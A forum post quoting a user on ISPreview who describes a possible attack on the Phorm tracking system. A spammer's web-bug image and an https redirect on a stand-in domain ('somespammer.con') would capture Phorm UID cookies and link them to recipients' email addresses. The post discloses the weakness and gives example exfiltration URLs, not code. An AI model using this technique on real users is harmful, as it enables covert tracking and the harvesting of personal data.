[Florence]

Another exploit found in phorm http://www.ispreview.co.uk/talk/show...3&postcount=21

Quote:

posted by Mel on ISPreview.
Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.

Only it occurred to me that by spamming 'everybody'@a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses.

The webbug could be an http: image link containing the email address it was sent to (ie your email address) suitably escaped eg:-

http://somespammer.con/uidcaptureYourEmailAddress.jpg

If you view the email your client would request the image,

phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net UID to a webwise cookie in somespammmer's domain.

The spammer's server would reply with a redirect to a https: php script eg

https://somespammer.con/uidcaptureYourEmailAddress.php

The client automatically requests the https: url sending the webwise UID cookie.

Using https: bypasses phorm's intercept of the UID cookie, delivering the UID and email address to the spammer.

The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.